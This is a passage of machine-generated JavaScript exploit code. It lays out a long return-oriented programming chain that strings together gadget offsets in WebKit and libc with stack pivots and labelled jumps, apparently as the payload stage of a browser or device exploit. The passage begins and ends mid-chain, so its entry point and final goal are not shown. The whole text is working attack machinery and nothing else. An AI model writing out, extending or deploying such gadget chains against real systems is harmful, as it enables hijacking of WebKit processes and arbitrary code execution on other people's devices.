ropchain+218688, //L3793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218704, //L3794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3793: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3795: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3796: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218832, //L3798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218816, //L3797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3797: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L3798: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+218920, //L3800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3799: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3800: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218976, //L3801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3801: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3803: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+219056, //L3805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3805: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L3781: //L3806: libc_base+764760, //pop rsi ropchain+219136, //L3807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3807: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3809: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219256, //L3812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219240, //L3810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3812: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+219400, //L3815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219368, //L3813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219384, //L3814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3815: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+219480, //L3816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3816: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3818: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219600, //L3821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219584, //L3819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3821: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+219776, //L3824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+219792, //L3825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219744, //L3822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219760, //L3823 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3822: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3823: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3824: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3825: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+219952, //L3829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219920, //L3827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+219936, //L3828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3826: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3829: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+220040, //L3830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220056, //L3831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3830: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+220232, //L3833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220248, //L3834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220216, //L3832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3834: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+220408, //L3839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220424, //L3840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+220360, //L3836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3837: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3838: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3840: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+220536, //L3841+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+220528, //L3841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3841: db([0, 0]); // 0x0 set_gadgets([ ropchain+220552, //L3841+24 ropchain+221504, //L3835 libc_base+764760, //pop rsi ropchain+220592, //L3842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3842: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3844: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+220712, //L3847 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220696, //L3845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3847: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+220856, //L3850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220824, //L3848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220840, //L3849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3848: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3849: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220952, //L3852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3851: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3852: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3853: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+221056, //L3854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221072, //L3855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3854: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3855: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221248, //L3857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221264, //L3858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221232, //L3856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3856: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3857: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3858: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221408, //L3861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221424, //L3862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221376, //L3859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3859: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3860: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3861: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3862: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221496, //L3863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3863: db([0, 0]); // 0x0 //L3835: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+221624, //L3866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+221640, //L3867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221608, //L3865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3867: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221752, //L3869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221800, //L3872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221768, //L3870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3869: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3870: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+221912, //L3873+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+221904, //L3873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3873: db([0, 0]); // 0x0 set_gadgets([ ropchain+221928, //L3873+24 ropchain+223952, //L3868 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221968, //L3874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3874: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3875: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L3876: db([48, 0]); // 0x30 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222160, //L3880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222128, //L3878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222144, //L3879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3877: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3880: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+222216, //L3882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3882: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+222344, //L3884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+222360, //L3885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222328, //L3883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3883: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3884: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3885: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222456, //L3887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222440, //L3886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3886: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3887: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222536, //L3888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3890: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+222656, //L3893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222640, //L3891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+222800, //L3896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222768, //L3894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222784, //L3895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3894: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3896: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+222872, //L3898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3898: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222928, //L3899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L3899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223008, //L3901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3903: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+223128, //L3906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223112, //L3904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3906: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223272, //L3909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223240, //L3907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+223256, //L3908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3907: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3908: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3909: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223360, //L3911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3910: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3911: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, 
//pop rsi ropchain+223416, //L3912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3912: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3914: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+223496, //L3916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223600, //L3917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+223616, //L3918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3918: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+223704, //L3920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3920: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223760, //L3921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3921: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223832, //L3924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 
rcx libc_base+763368 //pop rcx ]); //L3924: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223888, //L3925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3925: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+223968, //L3927 //L3868: libc_base+782311, //pop rsp ropchain+223984, //L3928 //L3927: libc_base+782311, //pop rsp ropchain+219096, //L3806 //L3928: //L3929: libc_base+764760, //pop rsi ropchain+224024, //L3930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3932: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+224144, //L3935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224128, //L3933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3935: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+224320, //L3938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224336, //L3939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224288, //L3936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224304, //L3937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L3936: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3937: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3939: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+224432, //L3941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+224416, //L3940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3940: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3941: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3942: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3943: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+224632, //L3946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+224688, //L3947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
